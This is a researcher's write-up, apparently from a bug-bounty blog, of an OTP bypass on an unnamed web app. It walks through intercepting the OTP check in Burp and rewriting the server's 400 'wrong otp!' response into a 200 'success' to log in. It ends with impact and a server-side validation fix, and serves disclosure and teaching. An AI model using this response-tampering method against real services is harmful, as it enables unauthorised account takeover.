How I Bypassed The OTP By Different Method (Part-1)


Hello everyone! I’m Nitish, hope you all are doing great. In this post, I will share how I found an authentication bypass.

Today, I’m sharing a vulnerability that I found a while ago, which I believe is quite interesting.

SUMMARY:

Authentication bypass is a dangerous class of vulnerability found in web applications. An attacker can bypass the control mechanisms the application relies on, such as OTP, CAPTCHA, 2FA and email verification, and perform a complete account takeover of the victim.

Steps to Reproduce:

Step 1: Let’s consider my target is redacted.com; go to the login page.
Step 2: A login verification form will appear; enter the mail id and mobile number.

Step 3: In the OTP field, enter a wrong OTP and capture the request in Burp.

Step 4: Then click the action button, intercept the request and forward it.

Step 5: A response will appear. In the response, change

HTTP/1.1 400 Bad Request
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 02 Oct 2022 09:00:02 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 20
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE
Access-Control-Allow-Headers: X-Requested-With,content-type
Access-Control-Allow-Credentials: true

{"msg":"wrong otp!"}

this to

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 02 Oct 2022 09:00:02 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 20
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE
Access-Control-Allow-Headers: X-Requested-With,content-type
Access-Control-Allow-Credentials: true

{"msg":"success"}

Step 6: By this method, the attacker can bypass the OTP.

Step 7: With this same response, the attacker can bypass the OTP check for other phone numbers as well.

Impact :

An adversary can carry out an authentication bypass attack and perform an account takeover.

Recommendations :

The application should protect sensitive actions and validate the verification process on the server side, so that the outcome of the OTP check does not depend on the response the client reports back. Restrict the user from any further malicious behaviour.

That’s all, thank you very much for reading till the end. I hope you enjoyed it.
